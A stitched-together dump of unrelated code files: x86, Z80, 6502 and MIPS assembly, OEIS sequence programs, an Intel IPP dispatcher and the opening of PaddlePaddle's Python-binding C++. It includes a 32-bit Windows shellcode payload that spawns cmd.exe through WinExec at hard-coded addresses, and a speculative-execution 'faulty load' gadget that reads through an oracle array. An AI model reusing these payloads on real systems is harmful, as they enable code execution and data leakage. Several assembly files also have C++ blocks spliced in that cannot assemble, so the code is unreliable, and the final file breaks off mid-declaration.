mov $0x5152535455565758, %r9
movq %r9, %xmm0
vmovups %ymm0, (%rdx)
nop
nop
nop
nop
sub $29407, %r9
// Faulty Load
lea addresses_US+0x19197, %rdi
nop
nop
sub %rcx, %rcx
vmovups (%rdi), %ymm4
vextracti128 $1, %ymm4, %xmm4
vpextrq $0, %xmm4, %r12
lea oracles, %r14
and $0xff, %r12
shlq $12, %r12
mov (%r14,%r12,1), %r12
pop %rdx
pop %rdi
pop %rcx
pop %r9
pop %r14
pop %r13
pop %r12
ret
/*
<gen_faulty_load>
[REF]
{'src': {'type': 'addresses_US', 'same': False, 'size': 32, 'congruent': 0, 'NT': False, 'AVXalign': False}, 'OP': 'LOAD'}
{'src': {'type': 'addresses_US', 'same': True, 'size': 32, 'congruent': 0, 'NT': False, 'AVXalign': True}, 'OP': 'LOAD'}
{'dst': {'type': 'addresses_PSE', 'same': False, 'size': 16, 'congruent': 9, 'NT': False, 'AVXalign': False}, 'OP': 'STOR'}
{'dst': {'type': 'addresses_PSE', 'same': False, 'size': 8, 'congruent': 4, 'NT': False, 'AVXalign': False}, 'OP': 'STOR'}
{'dst': {'type': 'addresses_WC', 'same': False, 'size': 32, 'congruent': 3, 'NT': False, 'AVXalign': False}, 'OP': 'STOR'}
[Faulty Load]
{'src': {'type': 'addresses_US', 'same': True, 'size': 32, 'congruent': 0, 'NT': False, 'AVXalign': False}, 'OP': 'LOAD'}
<gen_prepare_buffer>
{'dst': {'type': 'addresses_D_ht', 'same': False, 'size': 4, 'congruent': 7, 'NT': False, 'AVXalign': False}, 'OP': 'STOR'}
{'src': {'type': 'addresses_normal_ht', 'same': False, 'size': 2, 'congruent': 3, 'NT': False, 'AVXalign': False}, 'OP': 'LOAD'}
{'src': {'type': 'addresses_WC_ht', 'same': False, 'size': 4, 'congruent': 9, 'NT': True, 'AVXalign': False}, 'OP': 'LOAD'}
{'dst': {'type': 'addresses_UC_ht', 'same': False, 'size': 16, 'congruent': 1, 'NT': False, 'AVXalign': False}, 'OP': 'STOR'}
{'src': {'type': 'addresses_A_ht', 'same': False, 'size': 4, 'congruent': 2, 'NT': False, 'AVXalign': False}, 'OP': 'LOAD'}
{'src': {'type': 'addresses_UC_ht', 'same': False, 'size': 2, 'congruent': 3, 'NT': False, 'AVXalign': True}, 'OP': 'LOAD'}
{'dst': {'type': 'addresses_A_ht', 'same': False, 'size': 16, 'congruent': 5, 'NT': True, 'AVXalign': False}, 'OP': 'STOR'}
{'src': {'type': 'addresses_A_ht', 'same': False, 'size': 2, 'congruent': 3, 'NT': False, 'AVXalign': False}, 'OP': 'LOAD'}
{'src': {'type': 'addresses_UC_ht', 'same': False, 'size': 1, 'congruent': 8, 'NT': False, 'AVXalign': True}, 'OP': 'LOAD'}
{'src': {'type': 'addresses_D_ht', 'same': False, 'size': 16, 'congruent': 0, 'NT': False, 'AVXalign': True}, 'OP': 'LOAD'}
{'src': {'type': 'addresses_D_ht', 'same': False, 'size': 2, 'congruent': 9, 'NT': False, 'AVXalign': False}, 'OP': 'LOAD'}
{'dst': {'type': 'addresses_WC_ht', 'same': False, 'size': 1, 'congruent': 1, 'NT': False, 'AVXalign': False}, 'OP': 'STOR'}
{'src': {'type': 'addresses_normal_ht', 'congruent': 3, 'same': False}, 'dst': {'type': 'addresses_UC_ht', 'congruent': 11, 'same': False}, 'OP': 'REPM'}
{'dst': {'type': 'addresses_WC_ht', 'same': False, 'size': 8, 'congruent': 1, 'NT': False, 'AVXalign': False}, 'OP': 'STOR'}
{'src': {'type': 'addresses_WT_ht', 'same': False, 'size': 4, 'congruent': 7, 'NT': True, 'AVXalign': True}, 'OP': 'LOAD'}
{'00': 60}
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
*/
|
;
; f_ansi_scrollup
;
; Scroll screen up one line
;
; We set the window to non-scrolling.
;
;
; $Id: f_ansi_scrollup.asm,v 1.3 2001/05/02 09:21:51 dom Exp $
;
XLIB ansi_SCROLLUP
INCLUDE "#stdio.def"
.ansi_SCROLLUP
ld a,1
call_oz(os_out)
ld a,255
call_oz(os_out)
ret
|
; A091650: Let M = the 4 X 4 matrix [0 1 0 0 / 0 0 1 0 / 0 0 0 1 / -1 -1 3 2]. Set seed vector = [1 1 1 1] = first row, then take M*[1 1 1 1] = [1 1 1 3] then M * [1 1 1 3], etc. Sequence gives terms in rightmost column.
; 1,3,7,21,59,171,491,1415,4073,11729,33771,97241,279993,806209,2321385,6684163,19246279,55417453,159568195,459458307,1322957467,3809304207,10968454313,31582405473,90937912211,261845282321,753953441489,2170922412257,6250921954449
mov $3,1
lpb $0
mov $2,$0
sub $0,2
seq $2,123941 ; The (1,2)-entry in the 3 X 3 matrix M^n, where M = {{2, 1, 1}, {1, 1, 0}, {1, 0, 0}}.
add $3,$2
lpe
add $3,2
add $0,$3
mul $0,2
sub $0,5
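;
; The matrix iteration in the header collapses to a 4-term recurrence: the
; last row of M gives a(n) = 2*a(n-1) + 3*a(n-2) - a(n-3) - a(n-4), with
; a(0..3) = 1, 3, 7, 21. A short C++ check of the listed terms:
#include <cstdio>
int main() {
    long long a[16] = {1, 3, 7, 21};
    for (int n = 4; n < 16; ++n)
        a[n] = 2*a[n-1] + 3*a[n-2] - a[n-3] - a[n-4];
    for (int n = 0; n < 16; ++n)
        std::printf("%lld ", a[n]);   // 1 3 7 21 59 171 491 1415 ...
    return 0;
}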
|
;
; ZX81 specific routines
; by Stefano Bodrato, Fall 2013
;
; int psg_init();
;
; Set up the PSG
;
;
; $Id: psg_init.asm,v 1.3 2016/06/26 20:32:08 dom Exp $
;
SECTION code_clib
PUBLIC psg_init
PUBLIC _psg_init
psg_init:
_psg_init:
ld e,@01010101
xor a ; R0: Channel A frequency low bits
call outpsg
ld e,a
ld d,12
psg_iniloop:
inc a ; R1-13: set all to 0 but 7 and 11
cp 7
jr z,skip
;cp 11
;jr z,skip
call outpsg
skip:
dec d
jr nz,psg_iniloop
ld e,@11111000 ; R7: Channel setting. Enable sound channels ABC and input on ports A and B
ld a,7
call outpsg
ld e,@00001011 ; R11: Envelope
ld a,11
outpsg:
;LD BC,$cf
LD BC,$df
OUT (C),a
LD C,$0f
;LD C,$1f
OUT (C),e
ret
|
# Trevor Hickey
# Code was written in MARS 4.2
# Program Description:
# This program will ask for 3 integers from the user.
# Once it has validated all of the user data, it will return the
# number with the largest value.
# Algorithm
# 1. Prompt User
# 2. Get User Value
# 3. While (userInput is invalid){
# Get User Value
# }
# 4. Store value as largest number
# 5. Get 2nd User Value
# 6. While (userInput is invalid){
# Get 2nd User Value
# }
# 7. If (2nd User Value > Current User Value){
# Store 2nd value as largest number
# }
# 8. Get 3rd User Value
# 9. While (userInput is invalid){
# Get 3rd User Value
# }
# 10. If (3rd User Value > Current User Value){
# Store 3rd value as largest number
# }
# 11. Output The Largest Number To The User
# 12. Exit Program
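#
# A compact high-level sketch of steps 1-12 (editor's illustration; the
# MARS dialog syscalls below do the real prompting and validation):
int readValidInt(const char* prompt);  // assumed helper: reprompts until valid
int main() {
    int largest = readValidInt("Please enter an integer value for number 1");
    int v2 = readValidInt("Please enter an integer value for number 2");
    if (v2 > largest) largest = v2;    // step 7
    int v3 = readValidInt("Please enter an integer value for number 3");
    if (v3 > largest) largest = v3;    // step 10
    // step 11: report largest; step 12: exit
    return 0;
}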
.data
###################################################################################
purpose: .asciiz "Enter 3 integers, and I will tell you which is the largest" #
prompt1: .asciiz "Please enter an integer value for number 1" #
prompt2: .asciiz "Please enter an integer value for number 2" #
prompt3: .asciiz "Please enter an integer value for number 3" #
prompt4: .asciiz "The largest number you entered was " #
###################################################################################
.text
.globl main ####################
main: # Algorithm Number #
########################################################### ###########################################################
# ASSEMBLY CODE # # PSEUDOCODE #
########################################################### # #
##Inform the user the purpose of the program # # #
la $a0, purpose # # PRINT:"Enter 3 integers, and I will tell #
li $a1, 1 # 01 # you which is the largest" #
li $v0, 55 # # #
syscall # # #
##########################################################################################################################
##Get Value 1 # # #
PROMT_USER_FOR_VALUE_1: la $a0, prompt1 # # Get User Value #
li $v0, 51 # 02 # While (userInput is invalid){ #
syscall # 03 # Get User Value #
bnez $a1, PROMT_USER_FOR_VALUE_1 # # } #
la $t0, ($a0) # 04 # Store userInput as largest value #
##########################################################################################################################
##Get Value 2 # # Get 2nd User Value #
PROMT_USER_FOR_VALUE_2: la $a0, prompt2 # # While (userInput is invalid){ #
li $v0, 51 # 05 # Get 2nd User Value #
syscall # 06 # } #
bnez $a1, PROMT_USER_FOR_VALUE_2 # # If (2nd User Value > Current User Value){ #
bgt $t0, $a0, SKIP # # Store 2nd value as largest number #
la $t0, ($a0) # 07 # } #
SKIP: # # #
##########################################################################################################################
##Get Value 3 # # Get 3rd User Value #
PROMT_USER_FOR_VALUE_3: la $a0, prompt3 # # While (userInput is invalid){ #
li $v0, 51 # # Get 3rd User Value #
syscall # 09 # } #
bnez $a1, PROMT_USER_FOR_VALUE_3 # # If (3rd User Value > Current User Value){ #
bgt $t0, $a0, SKIP2 # # Store 3rd value as largest number #
la $t0, ($a0) # 10 # } #
SKIP2: # # #
##########################################################################################################################
##Show User The Largest Number # # #
la $a0, prompt4 # # #
la $a1, ($t0) # 11 # PRINT:"The largest number you entered was #
li $v0, 56 # # 'largestNumber' #
syscall # # #
##########################################################################################################################
##Exit Safely # # #
li $v0, 10 # 12 # return 0; #
syscall # # #
##########################################################################################################################
|
EXTERN pixeladdress
INCLUDE "graphics/grafix.inc"
; Generic code to handle the pixel commands
; Define NEEDxxx before including
ld a,l
cp 208
ret nc
push bc ;Save callers value
call pixeladdress ;hl = address, a = pixel number
ld b,a
ld a,1
jr z, rotated ; pixel is at bit 0...
.plot_position
rlca
djnz plot_position
; a = byte holding pixel mask
; hl = address
rotated:
IF NEEDunplot
or (hl)
ld (hl),a
ENDIF
IF NEEDplot
cpl
and (hl)
ld (hl),a
ENDIF
IF NEEDxor
ld c,a
ld a,(hl)
cpl
xor c
cpl
ld (hl),a
ENDIF
IF NEEDpoint
ld c,a
ld a,(hl)
cpl
and c
ENDIF
pop bc ;Restore callers
ret
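;
; The mask logic above in C++ terms, one helper per conditional block (a
; sketch only; whether a set bit means "pixel on" depends on the target's
; video polarity, which is why the plot and unplot blocks look inverted):
typedef unsigned char byte;
byte maskFor(unsigned bit)            { return (byte)(1u << bit); }
void needUnplot(byte* p, byte m)      { *p |= m; }                 // or (hl)
void needPlot(byte* p, byte m)        { *p &= (byte)~m; }          // cpl / and (hl)
void needXor(byte* p, byte m)         { *p ^= m; }                 // cpl/xor/cpl == xor
byte needPoint(const byte* p, byte m) { return (byte)(~*p & m); }  // cpl / and c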
|
; A168856: Number of reduced words of length n in Coxeter group on 35 generators S_i with relations (S_i)^2 = (S_i S_j)^20 = I.
; 1,35,1190,40460,1375640,46771760,1590239840,54068154560,1838317255040,62502786671360,2125094746826240,72253221392092160,2456609527331133440,83524723929258536960,2839840613594790256640,96554580862222868725760
add $0,1
mov $3,1
lpb $0
sub $0,1
add $2,$3
div $3,$2
mul $2,34
lpe
mov $0,$2
div $0,34
|
; A008825: Expansion of (1+2*x^5+x^9)/((1-x)^2*(1-x^9)).
; 1,2,3,4,5,8,11,14,17,22,27,32,37,42,49,56,63,70,79,88,97,106,115,126,137,148,159,172,185,198,211,224,239,254,269,284,301,318,335,352,369,388,407,426,445,466,487,508,529,550,573,596,619,642,667,692,717,742,767,794,821,848,875,904,933,962,991,1020,1051,1082,1113,1144,1177,1210,1243,1276,1309,1344,1379,1414,1449,1486,1523,1560,1597,1634,1673,1712,1751,1790,1831,1872,1913,1954,1995,2038,2081,2124,2167,2212
mov $1,$0
mul $1,2
mov $2,$1
lpb $2
sub $2,9
add $0,$2
mov $3,$2
gcd $3,2
add $0,$3
lpe
add $0,1
|
;
; LOBSCH (Last Object Search) subroutine.
; Finds, and saves in LOBJAD, the address
; of the last object in a file; also
; counts, and returns in Y-reg, the number
; of objects in the file. File to search
; is EGO file if called with Y=0; is
; file at LOCAD if called with Y=1.
;
LOBSCH: LDX EGOLAD,Y ; Get pointer to file.
LDY #$FF ; Init object-count.
;
OBFIND: INX
STX LOBJAD ; Save addr of last obj.
LDA 1,X ; Set up to test bits
ASL ; 7 & 6 of each location.
BMI OBFIND ; b6=1. Not an object.
INY ; Bump object-count.
BCC OBFIND ; b7=0. An object. Continue.
RTS ; b7=1. End of file. Done.
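;
; (Note: Y is initialised to $FF, i.e. -1. The end-of-file byte,
; which must have b7=1 and b6 clear for the BMI/BCC ordering to
; reach RTS, also passes through INY; that extra increment
; cancels the -1, leaving Y equal to the object count.)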
;
;
;
; ADDOBJ (Add Object) subroutine. Called to
; add a dropped object to a location file,
; or a picked-up object to EGO file.
; LINTAX is the pointer to the address of
; the location of interest: 0 for EGO,
; 1 for file specified by LOCAD. Calls
; LOBSCH subroutine. Object to be added
; is specified by contents of OBJ.
;
ADDOBJ: LDY LINTAX ; Point to file of interest.
JSR LOBSCH ; Find last obj's address.
LDX #EOCM ; Start at End of Cave Map.
AOBLP: LDA 0,X ; Move all files up one
STA 1,X ; location to make room
DEX ; for the object.
CPX LOBJAD ; Done yet?
BNE AOBLP ; No. Keep moving.
LDA OBJ ; Yes, store object just
STA 1,X ; above last object in
RTS ; the file; return.
;
;
; SPROC (Special Processing) segment.
; Entered from Main Move Loop (MNMVLP)
; following a "direction" command, this
; code takes care of any special pro-
; hibitions against moving in the com-
; manded direction. (Examples -- can't
; go through a steel grate, or past a
; dragon.) Possible exits from a SPROC
; are: to MOVER, if no problems with
; the command direction,
; to HOWMSG, if "How ? " is to be
; shown to indicate improper
; conditions for the move, or
; to MSGAML, showing "Halted By
; The Dragon", if appropriate.
;
SPROC: TAY
STY DIR ; Save direction for MOVER.
LDX LOCNUM
LDA LNAMAD,X ; If at grate (or gully),
CMP ADOPGR-5,X ; is grate open (or is
; bridge made)?
BEQ SPATS ; Yes, move is OK.
CPX #[ADGRM-LNAMAD] ; No. At closed
; grate?
BEQ SPCHKD ; Yes, disallow Down.
CPX #[ADGYM-LNAMAD] ; At bridgeless
; gully?
BEQ SPCHKW ; Yes, disallow West.
SPATS: CPX #[ADTSM-LNAMAD] ; At shaft?
BNE SPATSS
LDA NOBCRY ; Yes, carrying anything?
BNE SPCHKD ; Yes, disallow Down.
;
SPATSS: CPX #[ADSSM-LNAMAD] ; At steps?
BNE SPATRH
LDA BURDEN ; Yes, carrying Gold?
BMI SPCHKU ; Yes, disallow Up.
;
SPATRH: CPX #[ADRHM-LNAMAD] ; At Royal Hall?
BNE SPCONT
LDA DRAGON ; Yes, is Dragon there?
BEQ SPCONT
DEY ; Yes, but going East
BEQ SPCONT ; is OK. Continue.
LDY #<HBDMS ; All other directions,
JMP MSGAML ; "Halted by Dragon."
;
SPCHKD: DEY ; Check for Down,
SPCHKU: DEY ; for Up, or
SPCHKW: CPY #3 ; for West.
BNE SPCONT ; Other directions are OK.
JMP HOWMSG ; Disallowed direction
; produces "How ? ".
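; (The DEY chain funnels three cases into one CPY #3 test:
; entry at SPCHKD rejects direction code 5 (Down), SPCHKU
; rejects 4 (Up), and SPCHKW rejects 3 (West). The codes are
; inferred from the chain, not stated elsewhere in this listing.)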
;
SPCONT: JMP MOVER ; Continue Move process.
;
;
;
;
; These three bytes
; are left spare for
; user expansion....
|
; A185906: Weight array of A000007 (which has only one nonzero term and whose second accumulation array is the multiplication table for the positive integers), by antidiagonals.
; 1,-1,-1,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
mov $1,$0
div $0,4
sub $2,$1
dif $2,2
add $0,$2
pow $0,$2
|
BITS 32
section .data
section .text
global _start
_start:
push ebp
mov ebp, esp
xor eax, eax
mov al, 0x08 ; 8 bytes of stack for "cmd.exe" + NUL
sub esp, eax
xor eax, eax
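; build the NUL-terminated string "cmd.exe" byte by byte at [ebp-8]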
mov byte [ebp-0x08], 0x63
mov byte [ebp-0x07], 0x6d
mov byte [ebp-0x06], 0x64
mov byte [ebp-0x05], 0x2e
mov byte [ebp-0x04], 0x65
mov byte [ebp-0x03], 0x78
mov byte [ebp-0x02], 0x65
mov byte [ebp-0x01], al
lea ebx, [ebp - 0x08]
inc eax ; eax = 1 = SW_SHOWNORMAL
push eax ; uCmdShow
push ebx ; lpCmdLine -> "cmd.exe"
mov edx, 0x7c862aed ; WinExec("cmd.exe", SW_SHOWNORMAL), hard-coded kernel32 address
call edx
xor eax, eax
inc eax ; exit code = 1
push eax ; ExitProcess is stdcall: pass the code on the stack
mov edx, 0x7c81cb12 ; exit(1), hard-coded kernel32 address
call edx |
; A064322: Triply triangular numbers.
; 0,1,21,231,1540,7260,26796,82621,222111,536130,1186570,2445366,4747821,8763391,15487395,26357430,43398586,69401871,108140571,164629585,245433090,359026206,516216646,730632651,1019283825,1403201800,1908167976,2565535896,3413156131,4496411865,5869373685,7596082396,9751968996,12425421261,15719506705,19753861995,24666759216,30617359696,37788166416,46387686345,56653314355,68854450686,83295864246,100321314346,120317443785,143717956515,171008093431,202729420146,239484940926,281944553275,330850857975
add $0,1
bin $0,2
add $0,1
bin $0,2
add $0,1
bin $0,2
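; Cross-check (a sketch, not part of the program): each add/bin pair
; applies T(k) = C(k+1,2) = k*(k+1)/2, so a(n) = T(T(T(n))). In Python:
;   t = lambda k: k * (k + 1) // 2
;   a = lambda n: t(t(t(n)))
;   # a(2) == 21 and a(3) == 231, matching the data.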
|
extern m7_ippsGFpECGetInfo_GF:function
extern n8_ippsGFpECGetInfo_GF:function
extern y8_ippsGFpECGetInfo_GF:function
extern e9_ippsGFpECGetInfo_GF:function
extern l9_ippsGFpECGetInfo_GF:function
extern n0_ippsGFpECGetInfo_GF:function
extern k0_ippsGFpECGetInfo_GF:function
extern ippcpJumpIndexForMergedLibs
extern ippcpSafeInit:function
segment .data
align 8
dq .Lin_ippsGFpECGetInfo_GF
.Larraddr_ippsGFpECGetInfo_GF:
dq m7_ippsGFpECGetInfo_GF
dq n8_ippsGFpECGetInfo_GF
dq y8_ippsGFpECGetInfo_GF
dq e9_ippsGFpECGetInfo_GF
dq l9_ippsGFpECGetInfo_GF
dq n0_ippsGFpECGetInfo_GF
dq k0_ippsGFpECGetInfo_GF
segment .text
global ippsGFpECGetInfo_GF:function (ippsGFpECGetInfo_GF.LEndippsGFpECGetInfo_GF - ippsGFpECGetInfo_GF)
.Lin_ippsGFpECGetInfo_GF:
db 0xf3, 0x0f, 0x1e, 0xfa
call ippcpSafeInit wrt ..plt
align 16
ippsGFpECGetInfo_GF:
db 0xf3, 0x0f, 0x1e, 0xfa
mov rax, qword [rel ippcpJumpIndexForMergedLibs wrt ..gotpc]
movsxd rax, dword [rax]
lea r11, [rel .Larraddr_ippsGFpECGetInfo_GF]
mov r11, qword [r11+rax*8]
jmp r11
.LEndippsGFpECGetInfo_GF:
|
/* Copyright (c) 2016 PaddlePaddle Authors. All Rights Reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License. */
#include <Python.h>
#include <algorithm>
#include <cctype>
#include <cstdlib>
#include <iterator>
#include <map>
#include <memory>
#include <mutex> // NOLINT // for call_once
#include <string>
#include <tuple>
#include <type_traits>
#include <unordered_map>
#include <unordered_set>
#include <utility>
#include <vector>
#include "paddle/fluid/framework/convert_utils.h"
#include "paddle/fluid/framework/custom_operator.h"
#include "paddle/fluid/framework/data_layout.h"
#include "paddle/fluid/framework/data_type_transform.h"
#include "paddle/fluid/framework/executor.h"
#include "paddle/fluid/framework/executor_cache.h"
#include "paddle/fluid/framework/executor_gc_helper.h"
#include "paddle/fluid/framework/feed_fetch_method.h"
#include "paddle/fluid/framework/feed_fetch_type.h"
#include "paddle/fluid/framework/garbage_collector.h"
#include "paddle/fluid/framework/io/fs.h"
#include "paddle/fluid/framework/ir/coalesce_grad_tensor_pass.h"
#include "paddle/fluid/framework/ir/cost_model.h"
#include "paddle/fluid/framework/ir/generate_pass.h"
#include "paddle/fluid/framework/ir/pass_builder.h"
#include "paddle/fluid/framework/lod_rank_table.h"
#include "paddle/fluid/framework/lod_tensor_array.h"
#include "paddle/fluid/framework/new_executor/standalone_executor.h"
#include "paddle/fluid/framework/op_info.h"
#include "paddle/fluid/framework/op_registry.h"
#include "paddle/fluid/framework/op_version_registry.h"
#include "paddle/fluid/framework/parallel_executor.h"
#include "paddle/fluid/framework/phi_utils.h"
#include "paddle/fluid/framework/prune.h"
#include "paddle/fluid/framework/reader.h"
#include "paddle/fluid/framework/save_load_util.h"
#include "paddle/fluid/framework/scope_pool.h"
#include "paddle/fluid/framework/selected_rows_utils.h"
#include "paddle/fluid/framework/tensor_util.h"
#include "paddle/fluid/framework/trainer.h"
#include "paddle/fluid/framework/type_defs.h"
#include "paddle/fluid/framework/version.h"
#include "paddle/fluid/imperative/amp_auto_cast.h"
#include "paddle/fluid/imperative/layer.h"
#include "paddle/fluid/memory/allocation/allocator_strategy.h"
#include "paddle/fluid/memory/allocation/mmap_allocator.h"
#include "paddle/fluid/operators/activation_op.h"
#include "paddle/fluid/operators/common_infer_shape_functions.h"
#include "paddle/fluid/operators/py_func_op.h"
#include "paddle/fluid/platform/cpu_helper.h"
#include "paddle/fluid/platform/cpu_info.h"
#include "paddle/fluid/platform/device/device_wrapper.h"
#include "paddle/fluid/platform/device_context.h"
#include "paddle/fluid/platform/dynload/dynamic_loader.h"
#include "paddle/fluid/platform/enforce.h"
#include "paddle/fluid/platform/init.h"
#include "paddle/fluid/platform/monitor.h"
#include "paddle/fluid/platform/place.h"
#include "paddle/fluid/platform/profiler.h"
#include "paddle/fluid/pybind/cuda_streams_py.h"
#include "paddle/fluid/pybind/distributed_py.h"
#include "paddle/fluid/pybind/eager.h"
#include "paddle/fluid/pybind/imperative.h"
#include "paddle/fluid/pybind/io.h"
#include "paddle/phi/core/compat/convert_utils.h"
#include "paddle/phi/core/lod_utils.h"
#include "paddle/utils/none.h"
#ifdef PADDLE_WITH_ASCEND
#include "paddle/fluid/pybind/ascend_wrapper_py.h"
#endif
#include "paddle/fluid/pybind/bind_cost_model.h"
#include "paddle/fluid/pybind/bind_fleet_executor.h"
#include "paddle/fluid/pybind/box_helper_py.h"
#include "paddle/fluid/pybind/communication.h"
#include "paddle/fluid/pybind/compatible.h"
#include "paddle/fluid/pybind/const_value.h"
#include "paddle/fluid/pybind/data_set_py.h"
#include "paddle/fluid/pybind/exception.h"
#include "paddle/fluid/pybind/fleet_wrapper_py.h"
#include "paddle/fluid/pybind/generator_py.h"
#include "paddle/fluid/pybind/global_value_getter_setter.h"
#include "paddle/fluid/pybind/gloo_context_py.h"
#include "paddle/fluid/pybind/gloo_wrapper_py.h"
#include "paddle/fluid/pybind/heter_wrapper_py.h"
#include "paddle/fluid/pybind/inference_api.h"
#include "paddle/fluid/pybind/ir.h"
#include "paddle/fluid/pybind/metrics_py.h"
#include "paddle/fluid/pybind/ps_gpu_wrapper_py.h"
#include "paddle/fluid/pybind/pybind_boost_headers.h"
#if defined(PADDLE_WITH_NCCL) || defined(PADDLE_WITH_RCCL)
#include "paddle/fluid/pybind/nccl_wrapper_py.h"
#endif
#include "paddle/fluid/framework/data_type.h"
#include "paddle/fluid/pybind/protobuf.h"
#include "paddle/fluid/pybind/pybind.h" // NOLINT
#include "paddle/fluid/pybind/reader_py.h"
#include "paddle/fluid/pybind/tensor_py.h"
#include "paddle/fluid/string/to_string.h"
#if defined(PADDLE_WITH_CUDA) || defined(PADDLE_WITH_HIP)
#if defined(PADDLE_WITH_NCCL) || defined(PADDLE_WITH_RCCL)
#include "paddle/fluid/operators/nccl/nccl_gpu_common.h"
#endif
#ifndef PADDLE_WITH_HIP
#include "paddle/fluid/platform/device/gpu/cuda/cuda_profiler.h"
#endif
#include "paddle/fluid/platform/device/gpu/gpu_info.h"
#endif
#ifdef PADDLE_WITH_ASCEND_CL
#include "paddle/fluid/platform/collective_helper.h"
#include "paddle/fluid/platform/device/npu/npu_info.h"
#include "paddle/fluid/platform/device/npu/npu_profiler.h"
#endif
#ifdef PADDLE_WITH_XPU
#include "paddle/fluid/platform/device/xpu/xpu_info.h"
#include "paddle/fluid/platform/device/xpu/xpu_op_list.h"
#endif
#include "paddle/fluid/platform/cuda_graph_with_memory_pool.h"
#ifdef PADDLE_WITH_IPU
#include "paddle/fluid/platform/device/ipu/ipu_backend.h"
#include "paddle/fluid/platform/device/ipu/ipu_info.h"
#endif
#ifdef PADDLE_WITH_MLU
#include "paddle/fluid/platform/device/mlu/mlu_info.h"
#endif
#ifdef PADDLE_WITH_CRYPTO
#include "paddle/fluid/pybind/crypto.h"
#endif
#if defined PADDLE_WITH_PSCORE
#include "paddle/fluid/pybind/fleet_py.h"
#endif
#include "pybind11/stl.h"
DECLARE_bool(use_mkldnn);
// disable auto conversion to list in Python
PYBIND11_MAKE_OPAQUE(paddle::framework::LoDTensorArray);
PYBIND11_MAKE_OPAQUE(paddle::framework::FetchUnmergedList);
PYBIND11_MAKE_OPAQUE(paddle::framework::FetchList);
PYBIND11_MAKE_OPAQUE(paddle::framework::FetchType);
namespace paddle {
namespace pybind {
PyTypeObject *g_place_pytype = nullptr;
PyTypeObject *g_cudaplace_pytype = nullptr;
PyTypeObject *g_cpuplace_pytype = nullptr;
PyTypeObject *g_xpuplace_pytype = nullptr;
PyTypeObject *g_npuplace_pytype = nullptr;
PyTypeObject *g_cudapinnedplace_pytype = nullptr;
PyTypeObject *g_mluplace_pytype = nullptr;
PyTypeObject *g_framework_tensor_pytype = nullptr;
PyTypeObject *g_framework_lodtensorarray_pytype = nullptr;
bool IsCompiledWithCUDA() {
#if !defined(PADDLE_WITH_CUDA) && !defined(PADDLE_WITH_HIP)
return false;
#else
return true;
#endif
}
bool IsCompiledWithNCCL() {
#ifdef PADDLE_WITH_NCCL
return true;
#else
return false;
#endif
}
bool IsCompiledWithROCM() {
#ifndef PADDLE_WITH_HIP
return false;
#else
return true;
#endif
}
bool IsCompiledWithAscend() {
#ifndef PADDLE_WITH_ASCEND
return false;
#else
return true;
#endif
}
bool IsCompiledWithXPU() {
#ifndef PADDLE_WITH_XPU
return false;
#else
return true;
#endif
}
bool IsCompiledWithNPU() {
#ifndef PADDLE_WITH_ASCEND_CL
return false;
#else
return true;
#endif
}
bool IsCompiledWithIPU() {
#ifndef PADDLE_WITH_IPU
return false;
#else
return true;
#endif
}
bool IsCompiledWithMKLDNN() {
#ifndef PADDLE_WITH_MKLDNN
return false;
#else
return true;
#endif
}
bool IsCompiledWithCINN() {
#ifndef PADDLE_WITH_CINN
return false;
#else
return true;
#endif
}
bool IsCompiledWithMLU() {
#ifndef PADDLE_WITH_MLU
return false;
#else
return true;
#endif
}
bool IsCompiledWithHETERPS() {
#ifndef PADDLE_WITH_HETERPS
return false;
#else
return true;
#endif
}
bool SupportsBfloat16() {
#ifndef PADDLE_WITH_MKLDNN
return false;
#else
if (platform::MayIUse(platform::cpu_isa_t::avx512_core))
return true;
else
return false;
#endif
}
bool SupportsBfloat16FastPerformance() {
#ifndef PADDLE_WITH_MKLDNN
return false;
#else
if (platform::MayIUse(platform::cpu_isa_t::avx512_bf16))
return true;
else
return false;
#endif
}
bool SupportsInt8() {
#ifndef PADDLE_WITH_MKLDNN
return false;
#else
return (platform::MayIUse(platform::cpu_isa_t::avx2) ||
platform::MayIUse(platform::cpu_isa_t::avx512f));
#endif
}
bool SupportsVNNI() {
#ifndef PADDLE_WITH_MKLDNN
return false;
#else
return platform::MayIUse(platform::cpu_isa_t::avx512_core_vnni);
#endif
}
bool IsCompiledWithBrpc() {
#ifndef PADDLE_WITH_DISTRIBUTE
return false;
#endif
return true;
}
bool IsCompiledWithDIST() {
#ifdef PADDLE_WITH_DISTRIBUTE
return true;
#else
return false;
#endif
}
template <typename PlaceType1, typename PlaceType2>
static inline bool IsSamePlace(const PlaceType1 &p1, const PlaceType2 &p2) {
return paddle::platform::Place(p1) == paddle::platform::Place(p2);
}
template <typename PlaceType>
static inline int PlaceIndex(const PlaceType &p) {
return static_cast<int>(paddle::platform::Place(p).GetType());
}
static PyObject *GetPythonAttribute(PyObject *obj, const char *attr_name) {
// NOTE(zjl): PyObject_GetAttrString would return nullptr when attr_name
// is not inside obj, but it would also set the error flag of Python.
// If the error flag is set in C++, C++ code would not raise Exception,
// but Python would raise Exception once C++ call ends.
// To avoid unexpected Exception raised in Python, we check whether
// attribute exists before calling PyObject_GetAttrString.
//
// Caution: PyObject_GetAttrString would increase reference count of PyObject.
// Developer should call Py_DECREF manually after the attribute is not used.
if (PyObject_HasAttrString(obj, attr_name)) {
return PyObject_GetAttrString(obj, attr_name);
} else {
return nullptr;
}
}
template <typename T>
static T PyObjectCast(PyObject *obj) {
try {
return py::cast<T>(py::handle(obj));
} catch (py::cast_error &) {
PADDLE_THROW(platform::errors::InvalidArgument(
"Python object is not type of %s, the real type is %s",
typeid(T).name(), obj->ob_type->tp_name));
}
}
using PyNameVarBaseMap = std::unordered_map<std::string, py::handle>;
static std::vector<std::shared_ptr<imperative::VarBase>> GetVarBaseList(
